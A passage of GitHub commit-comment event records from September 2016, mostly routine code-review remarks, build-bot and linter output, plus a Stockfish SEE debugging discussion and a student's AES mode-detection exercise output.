{"id":"4604894053","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19136453,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-22T20:28:53Z","updated_at":"2016-09-22T20:28:53Z","body":"Try this in current master, just before the return statement at the end of the see() function (line 1056 of position.cpp), then run bench:\r\n\r\n````\r\n  occupied = pieces() ^ from;\r\n  attackers = attackers_to(to, occupied) & occupied;\r\n  stmAttackers = attackers & pieces(~color_of(piece_on(from)));\r\n  nextVictim = type_of(piece_on(from));\r\n  \r\n  if (   nextVictim == KING \r\n      && stmAttackers != 0\r\n  //  && swapList[0]    // uncomment to see all illegal captures by king with positive see\r\n      )\r\n  {\r\n     std::cerr << *this << std::endl;\r\n     std::cerr << \"see(\" << UCI::move( m , false) << \") = \" << swapList[0] << std::endl;\r\n  }\r\n````\r\n\r\nThis shows all the bench positions with an illegal king move evaluated by SEE: most are illegal quiet moves evaluated as 0 by SEE, but there are some illegal captures by king with a positive SEE score, for instance:\r\n````\r\n +---+---+---+---+---+---+---+---+\r\n | B |   |   |   |   | k |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   | p | p | q | p |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   | n |   |   |   |   | p |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | p |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   | P |   | n |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | b |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P |   |   | P | Q | r |\r\n +---+---+---+---+---+---+---+---+\r\n | R |   |   |   |   | R | K |   |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: B4k2/p1ppqp2/1n4p1/3p4/4P1n1/2b5/PPP2PQr/R4RK1 w - - 0 17\r\nKey: E37BDDCDCEFF47DA\r\nCheckers: \r\nsee(g1h2) = 1285\r\n````\r\n\r\nThe SEE sequence for g1h2 goes: \"Kg1 takes Rh2, Ng4 takes Kh2, Qg2 takes Nh2\", value of g1h2 is 1285.\r\n\r\nI suppose this is known behavior that SEE can give a value to illegal moves, but then why does it change the bench (and hence the search) to give them a different value?"}},"created_at":"2016-09-22T20:28:53Z"}
{"id":"4604894824","type":"CommitCommentEvent","actor":{"login":"jmakeig"},"repo":{"name":"jmakeig/mltap"},"payload":{"comment":{"id":19136455,"position":null,"line":null,"path":null,"commit_id":"ed7d4d4424c0366633cbdabf525815f664cf8be3","created_at":"2016-09-22T20:29:01Z","updated_at":"2016-09-22T20:29:01Z","body":"Fixes #39 "}},"created_at":"2016-09-22T20:29:01Z"}
{"id":"4604898017","type":"CommitCommentEvent","actor":{"login":"LeonardoGaldino"},"repo":{"name":"pet-informatica/PET-Utility-NODE"},"payload":{"comment":{"id":19136463,"position":null,"line":null,"path":null,"commit_id":"3ca67a049604765375b221d566386ee73a7dc04a","created_at":"2016-09-22T20:29:37Z","updated_at":"2016-09-22T20:29:37Z","body":"Bom commit KKK"}},"created_at":"2016-09-22T20:29:37Z"}
{"id":"4604904946","type":"CommitCommentEvent","actor":{"login":"crontab-e"},"repo":{"name":"crontab-e/my-repository"},"payload":{"comment":{"id":19136483,"position":2,"line":2,"path":"README.md","commit_id":"81f8bf852044b61097d826587c7144b6d014ac3d","created_at":"2016-09-22T20:30:46Z","updated_at":"2016-09-22T20:30:46Z","body":"try to commit something"}},"created_at":"2016-09-22T20:30:46Z"}
{"id":"4604905568","type":"CommitCommentEvent","actor":{"login":"heechul"},"repo":{"name":"Skidro/linux"},"payload":{"comment":{"id":19136486,"position":42,"line":1341,"path":"mm/page_alloc.c","commit_id":"7e0b2f18429c58bdb1e6435c85ffe3a4d4c9ef1e","created_at":"2016-09-22T20:30:53Z","updated_at":"2016-09-22T20:30:53Z","body":"same as above."}},"created_at":"2016-09-22T20:30:53Z"}
{"id":"4604905949","type":"CommitCommentEvent","actor":{"login":"heechul"},"repo":{"name":"Skidro/linux"},"payload":{"comment":{"id":19136487,"position":16,"line":1203,"path":"kernel/fork.c","commit_id":"7e0b2f18429c58bdb1e6435c85ffe3a4d4c9ef1e","created_at":"2016-09-22T20:30:57Z","updated_at":"2016-09-22T20:30:57Z","body":"Same as above."}},"created_at":"2016-09-22T20:30:57Z"}
{"id":"4604906191","type":"CommitCommentEvent","actor":{"login":"heechul"},"repo":{"name":"Skidro/linux"},"payload":{"comment":{"id":19136488,"position":5,"line":1187,"path":"include/linux/sched.h","commit_id":"7e0b2f18429c58bdb1e6435c85ffe3a4d4c9ef1e","created_at":"2016-09-22T20:31:00Z","updated_at":"2016-09-22T20:31:00Z","body":"Hard coding a number (32) is not good. \r\nYou may want to use the following macro: MAX_PALLOC_BINS"}},"created_at":"2016-09-22T20:31:00Z"}
{"id":"4604906777","type":"CommitCommentEvent","actor":{"login":"Preetam"},"repo":{"name":"VividCortex/docs"},"payload":{"comment":{"id":19136489,"position":5,"line":59,"path":"content/how-to-use-vividcortex/metrics.md","commit_id":"d81ddeff866c13c7ced28bcc2b49c037136f982b","created_at":"2016-09-22T20:31:06Z","updated_at":"2016-09-22T20:31:06Z","body":"`Metric details`"}},"created_at":"2016-09-22T20:31:06Z"}
{"id":"4604909418","type":"CommitCommentEvent","actor":{"login":"Preetam"},"repo":{"name":"VividCortex/docs"},"payload":{"comment":{"id":19136493,"position":5,"line":59,"path":"content/how-to-use-vividcortex/metrics.md","commit_id":"d81ddeff866c13c7ced28bcc2b49c037136f982b","created_at":"2016-09-22T20:31:33Z","updated_at":"2016-09-22T20:31:33Z","body":"Actually, `Metric Details` :)."}},"created_at":"2016-09-22T20:31:33Z"}
{"id":"4604913724","type":"CommitCommentEvent","actor":{"login":"SuperUserNameMan"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19136506,"position":null,"line":null,"path":null,"commit_id":"f31400c04d49aee2d2433b5404e2f17cf54da3a1","created_at":"2016-09-22T20:32:19Z","updated_at":"2016-09-22T20:32:19Z","body":"Note that with this formula of the UV, the sphere is textured upside down and there is a large visual artifact at the last latitude.\r\n"}},"created_at":"2016-09-22T20:32:19Z"}
{"id":"4604914237","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":19136508,"position":null,"line":null,"path":null,"commit_id":"621e2bf749b9b7a798943094e499326d08afc333","created_at":"2016-09-22T20:32:25Z","updated_at":"2016-09-22T20:32:25Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Tester / Corriger la baseURL d'accès aux ressources à partir du tableau](https://trello.com/c/VfepgGf3/31-tester-corriger-la-baseurl-d-acces-aux-ressources-a-partir-du-tableau)"}},"created_at":"2016-09-22T20:32:25Z"}
{"id":"4604914473","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":19136509,"position":null,"line":null,"path":null,"commit_id":"76355590628322f5484f8085e6370cecbac2eb63","created_at":"2016-09-22T20:32:27Z","updated_at":"2016-09-22T20:32:27Z","body":"There's another one [here](https://github.com/Beep6581/RawTherapee/blob/76355590628322f5484f8085e6370cecbac2eb63/rtengine/iplab2rgb.cc#L209)"}},"created_at":"2016-09-22T20:32:27Z"}
{"id":"4604917043","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19136515,"position":null,"line":null,"path":null,"commit_id":"91f1ec7f6b72c245fa571c7fdb447cf42256c91f","created_at":"2016-09-22T20:32:55Z","updated_at":"2016-09-22T20:32:55Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.259.91f1ec7f6b72c245fa571c7fdb447cf42256c91f](http://build.palaso.org/viewLog.html?buildId=77073&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:08:34"}},"created_at":"2016-09-22T20:32:55Z"}
{"id":"4604918721","type":"CommitCommentEvent","actor":{"login":"chriskuehl"},"repo":{"name":"ocf/ocfweb"},"payload":{"comment":{"id":19136516,"position":41,"line":117,"path":"ocfweb/docs/templates/docs/lab.html","commit_id":"7aa9eea9d6fe33bdcb3cea46dfff428dca6f90b3","created_at":"2016-09-22T20:33:13Z","updated_at":"2016-09-22T20:33:13Z","body":"should this one be on the header above?"}},"created_at":"2016-09-22T20:33:13Z"}
{"id":"4604919301","type":"CommitCommentEvent","actor":{"login":"nachofregeiro"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19136518,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-22T20:33:19Z","updated_at":"2016-09-22T20:33:19Z","body":"I can see it's referencing plugins from **ionic-native/dist/es5/plugins** and it's throwing me errors transpiling in every readonly keyword found in each definition file.\r\n\r\nHere is a sample error:\r\nTypeScript error: c:/Projects/my-app/node_modules/ionic-native/dist/es5/plugins/contacts.d.ts(36,14): Error TS1005: '=' expected."}},"created_at":"2016-09-22T20:33:19Z"}
{"id":"4604919555","type":"CommitCommentEvent","actor":{"login":"Zambom"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19136519,"position":null,"line":null,"path":null,"commit_id":"21b49d36360d4f362742aa6527193cb3e0270c36","created_at":"2016-09-22T20:33:22Z","updated_at":"2016-09-22T20:33:22Z","body":"This 'app_label' isn't necessary... Just add 'forum' to INSTALLED_APPS in settings.py..."}},"created_at":"2016-09-22T20:33:22Z"}
{"id":"4604921538","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19136525,"position":null,"line":null,"path":null,"commit_id":"1e9537fddd470adf618f7d4fbfd0612d5cbdfe79","created_at":"2016-09-22T20:33:45Z","updated_at":"2016-09-22T20:33:45Z","body":"Yeah, I thought they'd be moving onto a system such as `1.1.1` for this release and `1.1.2` for the one after _(unless it was a more API-breaking release)_, but no, apparently not. It's a bit annoying."}},"created_at":"2016-09-22T20:33:45Z"}
{"id":"4604925414","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19136532,"position":null,"line":null,"path":null,"commit_id":"92b4254ad52945ec13a6b9b5f052a91458bf7a5c","created_at":"2016-09-22T20:34:29Z","updated_at":"2016-09-22T20:34:29Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=80)"}},"created_at":"2016-09-22T20:34:29Z"}
{"id":"4604925420","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19136533,"position":null,"line":null,"path":null,"commit_id":"ac89344d949e9b414ade967be8662df2b9f65c8c","created_at":"2016-09-22T20:34:29Z","updated_at":"2016-09-22T20:34:29Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=80)"}},"created_at":"2016-09-22T20:34:29Z"}
{"id":"4604928682","type":"CommitCommentEvent","actor":{"login":"lurqui21"},"repo":{"name":"Social-Projects/calibration-devices-system"},"payload":{"comment":{"id":19136537,"position":5,"line":27,"path":"repository/src/main/java/com/softserve/edu/entity/user/StateVerificatorEmployee.java","commit_id":"d9152de19d5df90b53a8e79a30f06f8c2f551848","created_at":"2016-09-22T20:35:05Z","updated_at":"2016-09-22T20:35:05Z","body":"WTF??"}},"created_at":"2016-09-22T20:35:05Z"}
{"id":"4604932503","type":"CommitCommentEvent","actor":{"login":"hkommineni"},"repo":{"name":"hkommineni/Crypto3"},"payload":{"comment":{"id":19136548,"position":null,"line":null,"path":null,"commit_id":"0524aeebca60f01d19371e7d8d8113cacb8f3508","created_at":"2016-09-22T20:35:48Z","updated_at":"2016-09-22T20:35:48Z","body":"Week4 exercises Output:\r\n\r\nC:\\Python27\\python.exe C:/Users/hkommineni/PycharmProjects/Crypto/Week4/week4.py\r\n AES in Cipher Block Chaining Mode, this program implements CBC mode using earlier ECB function.\r\nSo close, no matter how far\r\nCouldn't be much more from the heart\r\nForever trusting who we are\r\nAnd nothing else matters\r\n\r\nNever opened myself this way\r\nLife is ours, we live it our way\r\nAll these words I don't just say\r\nAnd nothing else matters\r\n\r\nTrust I seek and I find in you\r\nEvery day for us something new\r\nOpen mind for a different view\r\nAnd nothing else matters\r\n\r\nNever cared for what they do\r\nNever cared for what they know\r\nBut I know\r\n\r\nSo close, no matter how far\r\nCouldn't be much more from the heart\r\nForever trusting who we are\r\nAnd nothing else matters\r\n\r\nNever cared for what they do\r\nNever cared for what they know\r\nBut I know\r\n\r\nI never opened myself this way\r\nLife is ours, we live it our way\r\nAll these words I don't just say\r\nNothing else matters\r\n\r\nTrust I seek and I find in you\r\nEvery day for us, something new\r\nOpen mind for a different view\r\nAnd nothing else matters\r\n\r\nNever cared for what they say\r\nNever cared for games they play\r\nNever cared for what they do\r\nNever cared for what they know\r\nAnd I know, yeah!\r\n\r\nSo close, no matter how far\r\nCouldn't be much more from the heart\r\nForever trusting who we are\r\nNo, nothing else matters\u0001\r\n\r\n\r\n0 ecb Not Selected\r\n1 ecb Not Selected\r\n2 ecb Not Selected\r\n3 cbc Selected\r\n4 cbc Selected\r\n5 cbc Selected\r\n6 ecb Not Selected\r\n7 ecb Not Selected\r\n8 ecb Not Selected\r\n9 cbc Selected\r\n\r\n\r\nProcess finished with exit code 0"}},"created_at":"2016-09-22T20:35:48Z"}
{"id":"4604934349","type":"CommitCommentEvent","actor":{"login":"igel-kun"},"repo":{"name":"pyload/pyload"},"payload":{"comment":{"id":19136554,"position":13,"line":270,"path":"module/plugins/internal/SimpleCrypter.py","commit_id":"eabaf69a622a02af0e7658e9171722f4bc2fc3f5","created_at":"2016-09-22T20:36:10Z","updated_at":"2016-09-22T20:36:10Z","body":"shouldn't that be ```links = self.links```, since otherwise, the links on page 1 (that have been parsed before and stored in ```self.links``` will be lost?"}},"created_at":"2016-09-22T20:36:10Z"}
{"id":"4604939017","type":"CommitCommentEvent","actor":{"login":"roelvandijk"},"repo":{"name":"LumiGuide/haskell-opencv"},"payload":{"comment":{"id":19136565,"position":null,"line":null,"path":null,"commit_id":"8361d08c50854e8b611da9864db59c366ca6768c","created_at":"2016-09-22T20:37:00Z","updated_at":"2016-09-22T20:37:00Z","body":"Looks like we forgot that one. It is present in the [graph](http://lumiguide.github.io/haskell-opencv/doc/doc/color_conversions.png) I created of all color conversions supported by OpenCV."}},"created_at":"2016-09-22T20:37:00Z"}
{"id":"4604939080","type":"CommitCommentEvent","actor":{"login":"tananaev"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19136566,"position":null,"line":null,"path":null,"commit_id":"80bbc136baf6a91b967732fdae4238f827b9bf19","created_at":"2016-09-22T20:37:01Z","updated_at":"2016-09-22T20:37:01Z","body":"@Turbovix, if you want to contribute code, you have to send a pull request. Applies to all three comments."}},"created_at":"2016-09-22T20:37:01Z"}
{"id":"4604945768","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19136583,"position":null,"line":null,"path":null,"commit_id":"b99bea51c1e943b9799646ac19c50f3ffe85e79a","created_at":"2016-09-22T20:38:14Z","updated_at":"2016-09-22T20:38:14Z","body":"Its Organge/Yellow ..."}},"created_at":"2016-09-22T20:38:14Z"}
{"id":"4604948873","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19136589,"position":null,"line":null,"path":null,"commit_id":"7a57eda7a38e330437d8e2191242b475a13f67f4","created_at":"2016-09-22T20:38:50Z","updated_at":"2016-09-22T20:38:50Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) 